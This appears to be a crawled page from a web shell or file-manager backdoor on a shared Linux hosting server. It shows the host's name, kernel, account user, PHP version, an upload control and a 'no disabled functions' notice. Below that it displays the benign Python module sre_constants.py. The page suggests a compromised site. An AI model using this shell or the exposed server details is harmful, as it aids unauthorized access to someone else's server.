HEX
Server: Apache
System: Linux sxb1plzcpnl507244.prod.sxb1.secureserver.net 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
User: wq56f0r4bcb0 (10907037)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: //lib64/python3.12/sre_constants.py
import warnings
warnings.warn(f"module {__name__!r} is deprecated",
              DeprecationWarning,
              stacklevel=2)

from re import _constants as _
globals().update({k: v for k, v in vars(_).items() if k[:2] != '__'})